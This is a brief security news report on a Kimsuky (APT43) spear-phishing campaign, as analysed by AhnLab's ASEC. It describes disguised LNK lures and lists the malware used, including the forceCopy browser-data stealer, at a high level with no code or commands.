The North Korean state-sponsored hacking group Kimsuky has launched a new spear-phishing campaign utilizing forceCopy, an advanced information-stealing malware, according to research from AhnLab Security Intelligence Center (ASEC).

The attack chain begins with phishing emails containing disguised Windows shortcut (LNK) files that appear as Microsoft Office or PDF documents. When opened, these files trigger PowerShell or mshta.exe to download additional malicious payloads.

Key components of the attack include:
– PEBBLEDASH trojan
– Modified version of RDP Wrapper
– Custom proxy malware for persistent communications
– PowerShell-based keylogger
– forceCopy stealer targeting browser data

The forceCopy malware specifically targets web browser installation paths, likely attempting to steal stored credentials and configuration files while bypassing security measures.

This campaign marks a strategic shift for Kimsuky, as they move away from custom backdoors in favor of RDP Wrapper and proxy tools for host control. The group, also known as APT43, operates under North Korea’s Reconnaissance General Bureau (RGB) and has been active since 2012.

Recent intelligence from Genians indicates that Kimsuky has been utilizing Russian services to distribute phishing messages for credential theft, demonstrating their continued evolution in attack methodologies.